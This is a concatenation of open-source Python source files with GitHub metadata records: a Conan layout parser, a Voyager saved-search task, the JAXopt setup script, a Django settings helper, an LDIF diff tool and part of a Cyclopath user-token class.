def folder(self, ref, name, settings, options):
_, folders = self._load_data(ref, settings=settings, options=options)
try:
path = folders.get(str(ref)) or folders.get(None) or {}
return path[name]
except KeyError:
return None
@staticmethod
def _work_on_item(value):
value = value.replace('\\', '/')
return value
def _parse_layout_file(self, ref, settings, options):
content = load(self._filepath)
try:
content = render_layout_file(content, ref=ref, settings=settings, options=options)
parser = configparser.ConfigParser(allow_no_value=True)
parser.optionxform = str
if six.PY3:
parser.read_string(content)
else:
parser.readfp(six.StringIO(content))
except (configparser.Error, ConanException) as e:
raise ConanException("Error parsing layout file '%s' (for reference '%s')\n%s" %
(self._filepath, str(ref), str(e)))
return parser
def _load_data(self, ref, settings, options):
parser = self._parse_layout_file(ref, settings, options)
# Build a convenient data structure
data = OrderedDict()
folders = {}
for section in parser.sections():
reference, section_name = section.rsplit(":", 1) if ':' in section else (None, section)
if section_name in EditableLayout.folders:
items = [k for k, _ in parser.items(section)] or [""]
if len(items) > 1:
raise ConanException("'%s' with more than one value in layout file: %s"
% (section_name, self._filepath))
folders.setdefault(reference, {})[section_name] = self._work_on_item(items[0])
continue
if section_name not in EditableLayout.cpp_info_dirs:
raise ConanException("Wrong cpp_info field '%s' in layout file: %s"
% (section_name, self._filepath))
if reference:
if not check_valid_ref(reference):
raise ConanException("Wrong package reference '%s' in layout file: %s"
% (reference, self._filepath))
else:
r = ConanFileReference.loads(reference, validate=True)
if r.revision:
raise ConanException("Don't provide revision in Editable layouts")
data.setdefault(reference, {})[section_name] =\
[self._work_on_item(k) for k, _ in parser.items(section)]
return data, folders
def apply_to(self, ref, cpp_info, settings=None, options=None):
data, _ = self._load_data(ref, settings=settings, options=options)
# Apply the data to the cpp_info
data = data.get(str(ref)) or data.get(None) or {}
try:
for key, items in data.items():
setattr(cpp_info, key, items)
except Exception as e:
raise ConanException("Error applying layout in '%s': %s" % (str(ref), str(e)))
| {
"content_hash": "53c60d8cff3383d7c12648850fc792d7",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 109,
"avg_line_length": 40.078947368421055,
"alnum_prop": 0.5924710002188662,
"repo_name": "conan-io/conan",
"id": "8a251bd22c8f661b413953b2a4e9aca40f7d5de4",
"size": "4584",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "conans/model/editable_layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "264"
},
{
"name": "C++",
"bytes": "425"
},
{
"name": "CMake",
"bytes": "447"
},
{
"name": "Python",
"bytes": "8209945"
}
],
"symlink_target": ""
} |
import os
import sys
import json
import requests
import urllib
from utils import status
from utils import task_utils
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore', InsecureRequestWarning)
# Get SSL trust setting.
verify_ssl = task_utils.get_ssl_mode()
status_writer = status.Writer()
errors_reasons = {}
def find_between( s, first, last ):
"""Find a string between two characters."""
try:
start = s.index(first) + len(first)
end = s.index(last, start)
return s[start:end]
except ValueError:
return ""
def get_display_tempate_id(owner):
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/config/default".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json',
'x-access-token': task_utils.get_security_token(owner)})
if get_response.status_code == 200:
return get_response.json()['id']
else:
return ''
except requests.HTTPError:
return ''
except requests.exceptions.InvalidURL:
return ''
except requests.RequestException:
return ''
def get_existing_saved_search_query(search_name, owner):
"""Retrieves the query from an existing saved search."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/ssearch/export".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json',
'x-access-token': task_utils.get_security_token(owner)})
search_query = ''
if get_response.status_code == 200:
saved_searches = get_response.json()['searches']
for ss in saved_searches:
if ss['title'] == search_name:
search_query = ss['path']
return True, search_query
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
def delete_saved_search(search_name, owner):
"""Deletes an existing saved search. This is used when overwriting a saved search."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
get_url = "{0}/api/rest/display/ssearch/export".format(voyager_server)
get_response = requests.get(get_url, verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if get_response.status_code == 200:
delete_url = ''
saved_searches = get_response.json()['searches']
for ss in saved_searches:
if ss['title'] == search_name:
search_id = ss['id']
delete_url = "{0}/api/rest/display/ssearch/{1}".format(voyager_server, search_id)
break
if delete_url:
res = requests.delete(delete_url, verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if not res.status_code == 200:
if hasattr(res, 'content'):
return False, eval(res.content)['error']
else:
return False, 'Error creating saved search: {0}: {1}'.format(search_name, res.reason)
else:
return True, ''
else:
return True, ''
else:
return False, eval(get_response.content)['message']
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
def create_saved_search(search_name, groups, owner, query, has_q):
"""Create the saved search using Voyager API."""
try:
voyager_server = sys.argv[2].split('=')[1].split('solr')[0][:-1]
url = "{0}/api/rest/display/ssearch".format(voyager_server)
if query:
template_id = get_display_tempate_id(owner)
if has_q:
if query.endswith('/'):
path = "/q=" + query + 'disp={0}'.format(template_id)
else:
path = "/q=" + query + '/disp={0}'.format(template_id)
else:
if query.endswith('/'):
path ="/" + query + 'disp={0}'.format(template_id)
else:
path = "/" + query + '/disp={0}'.format(template_id)
query = {
"title": str(search_name),
"owner": str(owner['name']),
"path": str(path),
"share": groups,
"overwrite": True
}
else:
query = {
"title": search_name,
"owner": owner['name'],
"path": "",
"share": groups
}
response = requests.post(url, json.dumps(query), verify=verify_ssl, headers={'Content-type': 'application/json', 'x-access-token': task_utils.get_security_token(owner)})
if response.status_code == 200:
return True, 'Created save search: {0}'.format(response.json()['title'])
else:
if hasattr(response, 'content'):
return False, eval(response.content)['error']
else:
return False, 'Error creating saved search: {0}: {1}'.format(search_name, response.reason)
except requests.HTTPError as http_error:
return False, http_error
except requests.exceptions.InvalidURL as url_error:
return False, url_error
except requests.RequestException as re:
return False, re
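# Sketch of the JSON body posted by create_saved_search (field values are
# illustrative; the path encodes the query plus the display template id):
#
#     {
#         "title": "My search",
#         "owner": "admin",
#         "path": "/q=water/disp=<template_id>",
#         "share": ["group1"],
#         "overwrite": true
#     }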
def execute(request):
"""Remove tags.
:param request: json as a dict.
"""
query = ''
errors = 0
parameters = request['params']
archive_location = request['folder']
if not os.path.exists(archive_location):
os.makedirs(archive_location)
# Parameter values
search_action = task_utils.get_parameter_value(parameters, 'search_action', 'value')
search_name = task_utils.get_parameter_value(parameters, 'saved_searches', 'value')
search_name = eval(search_name[0])['text']
groups = task_utils.get_parameter_value(parameters, 'groups', 'value')
request_owner = request['owner']
result_count, response_index = task_utils.get_result_count(parameters)
fq = '/'
if 'fq' in parameters[response_index]['query']:
if isinstance(parameters[response_index]['query']['fq'], list):
for q in parameters[response_index]['query']['fq']:
if '{!tag=' in q:
q = q.split('}')[1]
if ':' in q:
facet = q.split(':')[0]
value = q.split(':')[1]
if '(' in value:
value = value.replace('(', '').replace(')', '')
value = urllib.urlencode({'val': value.replace('"', '')})
value = value.split('val=')[1]
facet2 = 'f.{0}='.format(facet)
q = '{0}{1}'.format(facet2, value) #q.replace(facet + ':', facet2)
fq += '{0}/'.format(q).replace('"', '')
else:
# Replace spaces with %20 & remove \\ to avoid HTTP Error 400.
fq += '&fq={0}'.format(parameters[response_index]['query']['fq'].replace("\\", ""))
if '{!tag=' in fq:
fq = fq.split('}')[1]
if ':' in fq:
if fq.startswith('/&fq='):
fq = fq.replace('/&fq=', '')
facet = fq.split(':')[0]
value = fq.split(':')[1].replace('(', '').replace(')', '').replace('"', '')
if 'place' not in facet:
value = urllib.urlencode({'val': value}).split('val=')[1]
facet2 = 'f.{0}='.format(facet)
if '(' in value:
fq = ''
if value.split(' '):
for v in value.split(' '):
fq += (facet2 + v.replace('(', '').replace(')', '') + '/').replace(':', '')
else:
value = urllib.urlencode({'val': value}).split('val=')[1]
fq = '{0}{1}'.format(facet2, value)
if '{! place.op=' in fq:
relop = find_between(fq, 'place.op=', '}')
fq = fq.replace('}', '').replace('{', '')
fq = fq.replace('! place.op={0}'.format(relop), '/place.op={0}/'.format(relop))
fq = fq.replace('place:', 'place=')
fq = fq.replace('&fq=', '')
hasQ = False
if 'q' in parameters[response_index]['query']:
query = parameters[response_index]['query']['q']
hasQ = True
if fq:
query += '/'
if fq:
if fq.startswith('/place'):
query += fq.replace('"', '')
elif '!tag' in query and 'OR' in query:
# e.g. "path": "/q=id:(92cdd06e01761c4c d9841b2f59b8a326) OR format:(application%2Fvnd.esri.shapefile)"
q = query.split('}')[1].replace('))/', '').replace('(', '').replace('(', '')
q = urllib.urlencode({'val': q.split(':')[1]}).split('val=')[1]
query = query.split(' OR ')[0] + ' OR ' + q
else:
if fq.startswith('f.//'):
fq = fq.replace('f.//', '/').replace('"', '')
if ' place.id' in fq:
fq = fq.replace(' place.id', '/place.id').replace('"', '')
if '{! place.op=' in fq:
relop = find_between(fq, 'place.op=', '}')
fq = fq.replace('}', '').replace('{', '')
fq = fq.replace('! place.op={0}'.format(relop), '/place.op={0}/'.format(relop)).replace('"', '')
query += fq.rstrip('/')
query = query.replace('f./', '')
query = query.replace('&fq=', '')
if search_action == 'Overwrite an existing saved search':
delete_result = delete_saved_search(search_name, request_owner)
if not delete_result[0]:
status_writer.send_state(status.STAT_FAILED, delete_result[1])
return
if query:
result = create_saved_search(search_name, groups, request_owner, query, hasQ)
else:
result = create_saved_search(search_name, groups, request_owner, "", hasQ)
if not result[0]:
errors += 1
errors_reasons[search_name] = result[1]
# Update state if necessary.
if errors > 0:
status_writer.send_state(status.STAT_FAILED, result[1])
else:
status_writer.send_status(result[1])
task_utils.report(os.path.join(request['folder'], '__report.json'), 1, 0, errors, errors_details=errors_reasons)
| {
"content_hash": "d45d7592e2c5f927f4d00940445f36dd",
"timestamp": "",
"source": "github",
"line_count": 262,
"max_line_length": 177,
"avg_line_length": 42.79770992366412,
"alnum_prop": 0.5270667974672255,
"repo_name": "voyagersearch/voyager-py",
"id": "c4670791a9ee13c134bea5d448f183c09a28555d",
"size": "11816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/tasks/create_saved_search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "Python",
"bytes": "1008753"
},
{
"name": "Shell",
"bytes": "14"
}
],
"symlink_target": ""
} |
"""Setup script for JAXopt."""
import os
from setuptools import find_packages
from setuptools import setup
folder = os.path.dirname(__file__)
version_path = os.path.join(folder, "jaxopt", "version.py")
__version__ = None
with open(version_path) as f:
exec(f.read(), globals())
req_path = os.path.join(folder, "requirements.txt")
install_requires = []
if os.path.exists(req_path):
with open(req_path) as fp:
install_requires = [line.strip() for line in fp]
readme_path = os.path.join(folder, "README.md")
readme_contents = ""
if os.path.exists(readme_path):
with open(readme_path) as fp:
readme_contents = fp.read().strip()
setup(
name="jaxopt",
version=__version__,
description="Hardware accelerated, batchable and differentiable optimizers in JAX.",
author="Google LLC",
author_email="[email protected]",
url="https://github.com/google/jaxopt",
long_description=readme_contents,
long_description_content_type="text/markdown",
license="Apache 2.0",
packages=find_packages(),
package_data={},
install_requires=install_requires,
classifiers=[
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
],
keywords="optimization, root finding, implicit differentiation, jax",
    # setuptools expects 'python_requires' (not 'requires_python').
    python_requires=">=3.7",
)
| {
"content_hash": "91d04f98c9c0b1ddd842d6caa8cb1eb1",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 88,
"avg_line_length": 31.78846153846154,
"alnum_prop": 0.6636418632788869,
"repo_name": "google/jaxopt",
"id": "b9f7934a9a7011632971e548ca5a2a3d04d58e09",
"size": "2229",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "670734"
}
],
"symlink_target": ""
} |
def inject_app_defaults(application):
"""Inject an application's default settings"""
try:
__import__('%s.settings' % application)
import sys
# Import our defaults, project defaults, and project settings
_app_settings = sys.modules['%s.settings' % application]
_def_settings = sys.modules['django.conf.global_settings']
_settings = sys.modules['django.conf'].settings
# Add the values from the application.settings module
for _k in dir(_app_settings):
if _k.isupper():
# Add the value to the default settings module
setattr(_def_settings, _k, getattr(_app_settings, _k))
# Add the value to the settings, if not already present
if not hasattr(_settings, _k):
setattr(_settings, _k, getattr(_app_settings, _k))
except ImportError:
# Silently skip failing settings modules
pass
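# Usage sketch (hypothetical app): given a module myapp/settings.py containing
# uppercase names such as MYAPP_TIMEOUT = 30, calling
# inject_app_defaults('myapp') copies MYAPP_TIMEOUT into Django's global
# defaults and into django.conf.settings unless the project already set it.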
inject_app_defaults(__name__)
| {
"content_hash": "672f5837d965ccde5969588b6c04434f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 63,
"avg_line_length": 33.11538461538461,
"alnum_prop": 0.6968641114982579,
"repo_name": "thsutton/django-application-settings",
"id": "b10e2fd5d64728ae7ec729e9e5591adf31e7e93c",
"size": "861",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "foo/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1926"
}
],
"symlink_target": ""
} |
import sys
from ldif import LDIFParser, LDIFWriter, LDIFRecordList
class LDIFVerifier():
"""
Check that two LDIF files contain equivalent LDAP information. If they
don't, emit a summary of the differences
"""
def __init__( self, file1, file2):
"""
Parameters:
file1
filename of first file to read
file2
filename of second file to read
"""
self.src1 = LDIFRecordList(open(file1))
self.src2 = LDIFRecordList(open(file2))
def emitDifferingValues( self, attributes1, attributes2):
"""
Emit a description of the differences between two dictionaries of attribute values
"""
for attributeName, attributeValues1 in attributes1.iteritems():
if attributeName in attributes2:
attributeValues2 = attributes2[attributeName]
if attributeValues1 != attributeValues2:
print " " + attributeName + ": " + str(attributeValues1) + " != " + str(attributeValues2)
else:
print " " + attributeName + ": missing in second file"
def emitDifferences( self, summary1, summary2):
"""
Emit all differences between the two LDAP objects. The
supplied parameters are dictionaries between the object DN and
a list of attributes
"""
count = 0
for dnLower,wrappedObject1 in summary1.iteritems():
(dn,attributes1) = wrappedObject1
if dnLower in summary2:
wrappedObject2 = summary2 [dnLower]
(dn2,attributes2) = wrappedObject2
if( attributes1 != attributes2):
count += 1
print "\n dn: " + dn
print " [difference in attribute values]\n"
self.emitDifferingValues( attributes1, attributes2)
else:
count += 1
print "\n dn: " + dn
print " [object missing in second file]\n"
self.printSummary( dn, attributes1)
for dnLower,wrappedObject2 in summary2.iteritems():
(dn,attributes2) = wrappedObject2
if not dnLower in summary1:
count += 1
print "\n dn: " + dn
print " [object missing in first file]\n"
self.printSummary( dn, attributes2)
return count
def printSummary( self, dn, attributes):
"""
Print a complete LDAP object
"""
for attributeName, attributeValues in attributes.iteritems():
for attributeValue in attributeValues:
print " " + attributeName + ": " + attributeValue
def buildSummary( self, records):
"""
Build
"""
summary = {}
for record in records:
dn,attributes = record
summary [dn.lower()] = (dn,attributes)
return summary
def compare( self):
"""
Check whether the two named files are equal.
"""
self.src1.parse()
summary1 = self.buildSummary( self.src1.all_records)
self.src2.parse()
summary2 = self.buildSummary( self.src2.all_records)
count = self.emitDifferences( summary1, summary2)
if( count > 0):
exit(1)
if( len(sys.argv) != 3):
sys.exit("Need two arguments")
verifier = LDIFVerifier( sys.argv[1], sys.argv[2])
verifier.compare()
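# Usage sketch: python compare.py expected.ldif actual.ldif
# Prints a per-DN summary of mismatched attributes and missing objects, and
# exits with status 1 when the two files differ.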
| {
"content_hash": "1e601ceafc90b579c2c87316f1aafe1d",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 116,
"avg_line_length": 32.41284403669725,
"alnum_prop": 0.5544862722898387,
"repo_name": "paulmillar/Xylophone",
"id": "ff21c68f2e51945ea6b7ba9e68e63c9bda213c6d",
"size": "3552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/util/compare.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "727"
},
{
"name": "Python",
"bytes": "3552"
},
{
"name": "XSLT",
"bytes": "171413"
}
],
"symlink_target": ""
} |
import conf
import g
import hashlib
import os
import psycopg2
import time
import urllib
import uuid
from grax.user import User
from gwis.query_base import Query_Base
from gwis.exception.gwis_error import GWIS_Error
from gwis.exception.gwis_warning import GWIS_Warning
from util_ import db_glue
from util_ import misc
log = g.log.getLogger('gwis.q_client')
class Query_Client(Query_Base):
__after_slots__ = (
'ip_addr', # ip address of the request
'remote_ip',
'remote_host',
'browser_id', # UUID session id for the browser
'session_id', # UUID session id for the client
'username', # User making request, or conf.anonymous_username
'user_id', # ID of user making request, or None for anon
'user_group_id', # User's private group ID, which could be anon group
'request_is_mobile', # Used to know if request came from Ccp Android app.
      'request_is_local',  # If the request is coming from localhost
      'request_is_script', # If the request is coming from a local(host) script
'request_is_secret', # If the request used the shared secret
'token_ok', # True if the user token is valid
)
# *** Constructor
def __init__(self, req):
Query_Base.__init__(self, req)
log.areq = req.areq
# Cache the IP address for simpler retrieval later
# FIXME: Are these always the same? Is one 'safer' to use?
if self.req.areq is not None:
self.ip_addr = self.req.areq.subprocess_env['REMOTE_ADDR']
self.remote_ip = self.req.areq.connection.remote_ip
# This is set in Fedora but not in Ubuntu.
self.remote_host = self.req.areq.connection.remote_host
rem_host = self.req.areq.get_remote_host()
if self.remote_host is None: # Ubuntu
# Ubuntu: '127.0.0.1', not Fedora: 'localhost'
self.remote_host = rem_host
# FIXME: I don't quite get the differences between OSes yet.
if self.remote_host == '127.0.0.1':
self.remote_host = 'localhost'
# FIXME: assert-if-debugging, like, m4 preprocess? with intent to be
# faster (you could test with the update script)
#g.assurt(self.remote_host == self.req.areq.hostname)
log.verbose('remote: ip: %s (%s) / host: %s (%s) / (%s)'
% (self.remote_ip, # same as ip_addr
self.ip_addr, # should be == eg 127.0.0.1
self.remote_host, # None in Ubuntu, else hostname
rem_host, # Ubuntu: 127.0.0.1
self.req.areq.hostname, # Ubuntu: localhost
))
else:
self.ip_addr = '127.0.0.1'
self.remote_ip = '127.0.0.1'
self.remote_host = 'localhost.localdomain'
self.request_is_mobile = False
self.request_is_local_set()
#
self.username = None
self.user_id = None
self.user_group_id = None
# ***
#
def request_is_local_set(self):
self.request_is_local = False
self.request_is_script = False
self.request_is_secret = False
try:
hostname = self.req.areq.hostname
g.assurt(hostname)
except AttributeError:
# This happens from routed.py, which creates a fake request for
# search_graph.
g.assurt(self.req.areq is None)
hostname = ''
log.verbose1('request_is_local_set: %s'
% (self.str_remote_ip_and_host_and_local_host(),))
      # Validate the server from where the request came: the hostname has to
      # be in conf.server_names (set in CONFIG). [M.f. command_client.py]
# 2012.08.16: Instead of assurting, return a nice error code instead
# (otherwise user sees "Cyclopath is having difficulty communicating
# with the Cyclopath servers", which is wrong because that's not the
# issue (and it's also wrong because there's only one Cyclopath server,
# not many of them)). See Bug 2713.
if ((hostname)
and (hostname not in conf.server_names)
and (hostname != conf.server_name)
and (hostname != 'localhost')
and (hostname != '127.0.0.1')):
log.error('Unexpected request on hostname: %s.'
% (hostname,))
raise GWIS_Error(
'%s%s'
% ('The Cyclopath server does not expect requests from %s. '
% (hostname,),
'Please check your URL or email %s for help.'
% (conf.mail_from_addr,),))
# We like to know if the request is local so we can enable commands we
# don't normally accept from remote clients (i.e., so we can support
# developer or experimental features, like changing group access
# permissions).
# NOTE The ccp.py script can be used to directly interact with pyserver,
# or it can interface with GWIS packets. In the latter case, we
# cannot determine if the call is coming from the script or from the
# user using flashclient.
# NOTE I've [lb has] seen os.getenv('PythonHandler') set in other
# environs, but not on Fedora Linux.
# NOTE: On Fedora, from ccp.py, os.getenv('_') == './ccp.py'
# NOTE: On Fedora, if you disable the network, these... return False?
is_httpd_user = ((os.getenv('APACHE_RUN_USER') == 'www-data') # Ubuntu
or (os.getenv('_') == '/usr/sbin/httpd')) # Fedora
if ( ((self.remote_host == 'localhost.localdomain')
or (self.remote_host == 'localhost')
or (self.remote_host == conf.server_ip))
and ((self.remote_ip == '127.0.0.1')
or (self.remote_ip == conf.server_ip))
and ((not hostname) or (hostname in conf.server_names))):
# FIXME (and EXPLAIN): Are the Apache request's host and IP
# trustworthy? I don't think so. But can they be spoofed
# to look like they're from localhost?
# BUG nnnn: We need to better lockdown the site... --no-password
# is such a back-door: you just need terminal access to
# the machine...
self.request_is_local = True
if not is_httpd_user:
g.assurt(self.req.areq is None)
# LOGNAME is set when a human user runs script, but not for apache.
g.assurt(os.getenv('LOGNAME'))
# NOTE: Also, normally, os.getenv('_') == '/usr/bin/python'
# or == './ccp.py', depending.
self.request_is_script = True
else:
g.assurt(is_httpd_user)
g.assurt(self.req.areq is not None)
#
def str_remote_ip_and_host_and_local_host(self):
remote_id = (
'from: %s / %svia: %s'
% (self.remote_ip,
'' if (self.remote_host == self.remote_ip)
else '%s / ' % (self.remote_host,),
self.req.areq.hostname if self.req.areq is not None else 'none',))
return remote_id
# *** Base class overrides
#
def decode_gwis(self):
self.browser_id = self.req.decode_key('browid', None)
# FIXME/Bug nnnn: This should be verified and maybe stored by us somehow.
# FIXME: GIA records that use sessid should timeout the sessid and clear
# the value eventually...
self.session_id = self.req.decode_key('sessid', None)
try:
self.session_id = uuid.UUID(self.session_id)
# Convert to string to get rid of the class wrapper.
# >>> uuid.uuid4()
# UUID('ed05a929-6acf-4315-abf2-8b229babf347')
# >>> str(uuid.uuid4())
# 'b1f691f6-0fb7-419f-811e-1a74c3c995a1'
self.session_id = str(self.session_id)
except TypeError:
g.assurt(not self.session_id)
         # The user did not specify a session ID, so we make one ourselves.
self.session_id = str(uuid.uuid4())
# But currently this is unexpected, since flashclient and android
# currently make up their own UUID (see Bug nnnn mentioned above
# about having pyserver assign and manage unique session IDs).
# MAYBE: For devs testing, e.g., with wget, there's no session ID.
# But maybe we should always make it mandatory so people
# don't game the system?
# 2014.09.20: logcheck says this happened again. Nothing weird
# in the apache log, though. And it wasn't a dev using wget or
# anything, [lb] don't think.
#
log.error('decode_gwis: unexpected: no Session ID')
# MAYBE: Is it ok to log the request?
log.info('EXPLAIN: decode_gwis: areq.the_request: %s'
% (self.req.areq.the_request,))
except:
# ValueError on wrongly-formatted str; AttributeError on other types.
raise GWIS_Error('decode_gwis: bad session ID')
# FIXME: Is this the proper place for this code?
# FIXME: Why does device come in metadata and not GET?
if self.req.doc_in is not None:
device = self.req.doc_in.find('metadata/device')
# FIXME: Compare to other place request_is_mobile is set (below).
if device is not None:
# NOTE: The URL might also contain "android=true".
# EXPLAIN: Diff. btw URL and metadata indicating android?
# The two seem redundant...
self.request_is_mobile = device.get('is_mobile', False)
# *** Public interface
#
def remote_host_or_remote_ip(self):
return (self.remote_host or self.remote_ip)
#
def user_token_generate(self, username):
      '''
      Generates a new unique login token for the given user, stores it in
      the user__token table, and returns it (or None if the user does not
      exist).
      '''
# Lookup the userid
res = self.req.db.sql(
"SELECT id FROM user_ WHERE username = %s", (username,))
# Bail if user doesn't exist
if len(res) != 1:
return None # no such user
user_id = res[0]['id']
# In Ccpv1, this fcn. used the user's hashed password and some request
# parameters (remote_addr, self.req.areq.protocol, HTTP_USER_AGENT,
# HTTP_ACCEPT_CHARSET, and HTTP_ACCEPT_LANGUAGE) to make the token, but
# that's not a very robust solution.
#
# See http://bugs.grouplens.org/show_bug.cgi?id=2608
#
# Basically, random, unique tokens are more secure, and flashclient
# uses different headers for normal GWIS requests vs. uploads, so a
# generated-token approach doesn't work, anyway; we should store the
# token in the database rather than trying to make it.
# Ccpv1:
# # Lookup the password
# r = self.req.db.sql(
# "SELECT password FROM user_ WHERE username = %s", (username,))
# token = (
# r[0]['password']
# + remote_addr
# + env.get('HTTP_USER_AGENT', '@')
# + env.get('HTTP_ACCEPT_CHARSET', '@')
# + self.req.areq.protocol
# + env.get('HTTP_ACCEPT_LANGUAGE', '@'))
# #self.req.p_notice('unhashed token for %s: %s' % (username, token))
# token = hashlib.md5(token).hexdigest()
# Count the number of times we try, so we don't try indefinitely.
num_tries = 1
if self.req.db.integrity_errs_okay:
log.warning('user_token_generate: unexpected integrity_errs_okay')
self.req.db.integrity_errs_okay = True
found_unique = False
while not found_unique:
token = str(uuid.uuid4())
# For now, test the same one and see what server throws
log.debug('user_token_generate: trying token: %s' % (token,))
if num_tries > 99:
raise GWIS_Error('user_token_generate: Too many tries!')
try:
# Lock the user_ table on the user name so we don't ever generate
# two active tokens for a user.
# FIXME: What about multiple devices? Like, desktop Web browser and
# mobile phone app...
# (found_row, locked_ok,
# ) = self.req.db.transaction_lock_row(
# 'user_', 'username', username)
# Ug, we don't need a lock so long as we're just inserting...
self.req.db.transaction_begin_rw()
# FIXME: Set date_expired after x minutes of inactivity!
# (In CcpV1, there was no expiry...)....
# FIXME: Don't do this, because user should be allowed to logon
# from more than one client.
#res = self.req.db.sql(
# """
# UPDATE
# user__token
# SET
# date_expired = now()
# WHERE
# username = '%s'
# -- AND user_id = %d
# AND date_expired IS NULL
# """ % (username, user_id,))
#g.assurt(res is None)
# Try the insert.
res = self.req.db.sql(
# SYNC_ME: ccpdev...logcheck/pyserver...sql().
            # Don't use a preceding newline.
"""INSERT INTO user__token
(user_token, username, user_id)
VALUES
('%s', '%s', %d)
""" % (token, username, user_id,))
g.assurt(res is None)
found_unique = True
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
except psycopg2.IntegrityError, e:
# IntegrityError: duplicate key value violates unique constraint
# "user__token_pkey"\n
log.debug('token_gen: IntegrityError: %s' % (str(e),))
g.assurt(str(e).startswith('duplicate key value violates'))
num_tries += 1 # Try again
self.req.db.transaction_rollback()
self.req.db.integrity_errs_okay = False
log.debug('user_token_generate: %s / new token: %s' % (user_id, token,))
return token
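   # Illustrative flow (caller name hypothetical): a password-login command
   # calls user_token_generate(username) after login_ok() succeeds and hands
   # the UUID back to the client; later requests present it as the 'token'
   # credential, which user_validate_parse() routes to user_token_verify().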
#
# If called via transaction_retryable:
# def user_token_verify(self, db, *args, **kwargs):
# (token, username,) = args
# but let's try the transaction_lock_row_logic fcn.
# with a timeout and/or max_tries.
#
# FIXME/BUG nnnn: mobile should use the token we send it.
#
def user_token_verify(self, token, username, going_deeper=False):
g.assurt(token and username)
# Get a lock on the token just so we can update its count. This
# shouldn't block except for overlapping requests from the same
# client, so no biggee.
# MAYBE: We don't need the lock except to update usage_count...
# which doesn't seem very much that important...
self.token_ok = False
# MAYBE: Using NOWAIT fails when server load is high, so [lb]
# uses STATEMENT_TIMEOUT instead of NOWAIT.
# But another solution might be to wrap UPDATE with a try/catch
# and not to lock at all...
time_0 = time.time()
found_row = None
locked_ok = False
try:
(found_row, locked_ok,
) = self.req.db.transaction_lock_row_logic(
table_to_lock='user__token',
row_logic=[('user_token', '=', self.req.db.quoted(token),),
('date_expired', 'IS', 'NULL',),
('usage_count', None, None,),
('username', None, None,),
],
#timeout=conf.gwis_default_timeout, # 2014.09.09: 80.0 secs.
# 2014.09.14: We can continue without the token lock (we'll
# just not update the user__token.usage_count value) so don't
# take forever until timing out.
# FIXME/BUG nnnn: Seriously, locking a user__token row should
# almost always work, so why is this not working when the server
# is busy running daily.runic.sh?
timeout=10.0, # MAGIC NUMBER: Try for at most 10 seconds...
max_tries=None,
timeout_logger=log.info)
# Log a Warning (which logcheck will see) above a certain
# threshold, and at least log a debug message above a lower
# bar. [lb] doesn't want to flood us with emails but I want
# to track this issue... i.e., What is causing it to take so
# long to get the lock: is the server "just busy"? I've seen
# this issue when I run the daily cron job, which dumps the
# database, etc. Maybe having one hard drive doing all of the
# dirty work just really sucks...
misc.time_complain('user_token_verify get user__token lock',
time_0,
# 2014.09.08: [lb] sees upwards of 2 seconds
# here and there... hrmmmm, should
# we worry?
#threshold_s=0.75,
#threshold_s=1.00,
#threshold_s=2.00,
#threshold_s=2.50,
# 2014.09.14: When cron runs our overnight jobs,
# this always seems to fire (try, say, at 3:15 AM).
# 2014.09.19: How exactly does this work?:
# Sep-19 03:28:20: time_complain: ... took 13.12 m.
#threshold_s=conf.gwis_default_timeout, # No errs?
# BUG nnnn/LOW PRIORITY?/EXPLAIN:
# gwis_default_timeout is not being honored,
# i.e., we set a 10 sec. timeout on lock-row but
# db_glue spins for 13 minutes? How does that work?
# The only reasonable explanation is that
# psycopg2's curs.execute took that long, right?
#threshold_s=840.0, # MAGIC_NUMBER: 840 s = 14 mins
threshold_s=1338.0, # MAGIC_NUMBER: 22.30 mins
at_least_debug=True,
debug_threshold=0.10,
info_threshold=0.25)
except psycopg2.DataError, e:
# This is only possible if client request is malformed. E.g.,
# DataError: invalid input syntax for uuid: "gibberish"
# LINE 10: AND user_token = 'gibberish'
log.error('user_token_verify: bad token: %s' % (token,))
raise GWIS_Warning('Unknown username or token',
'badtoken')
except Exception, e:
raise
if found_row:
# NOTE: This commits self.req.db, which recycles the cursor.
self.token_ok = self.user_token_verify_(found_row,
token,
username,
lock_acquired=locked_ok)
log.verbose(
'user_token_verify: found_row: %s / locked_ok: %s / token_ok: %s'
% (found_row, locked_ok, self.token_ok,))
